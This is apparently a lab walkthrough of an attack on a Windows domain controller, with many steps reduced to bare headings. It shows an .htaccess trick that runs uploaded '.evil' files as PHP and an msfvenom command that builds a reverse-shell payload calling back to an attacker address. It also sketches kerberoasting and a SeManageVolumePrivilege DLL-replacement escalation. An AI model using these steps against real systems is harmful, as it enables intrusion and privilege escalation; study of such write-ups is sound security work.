Access

Seems to be a domain controller with the ports open

80

Website present

There is an upload on the website: We also have an upload directory:

Now we can modify the .htaccess

To create new .htaccess file:

echo "AddType application/x-httpd-php .evil" > .htaccess

Now uploading it. We can access it at http://192.168.218.187/uploads/shell.evil: Then generating a msfvenom payload:

msfvenom -p windows/x64/shell_reverse_tcp -f exe LHOST=192.168.45.186 LPORT=4444 > reverse.exe

Now we can execute it after transfering to get a shell:

Might be possible but the process is most likely running as svc_apache.

Nope

Now using kerberoasting we got the hash:

Now cracking it:

Now to get a shell as svc_mssql:

We have SeManageVolumePrivilege:

Now we can use an exploit: https://github.com/CsEnox/SeManageVolumeExploit/releases Run it first

For Printconfig.dll:

Then transfer to machine Then copy it:

Then in powershell:

Now should have got a shell

Run it first

For Printconfig.dll:

Then transfer to machine Then copy it:

Last updated

Was this helpful?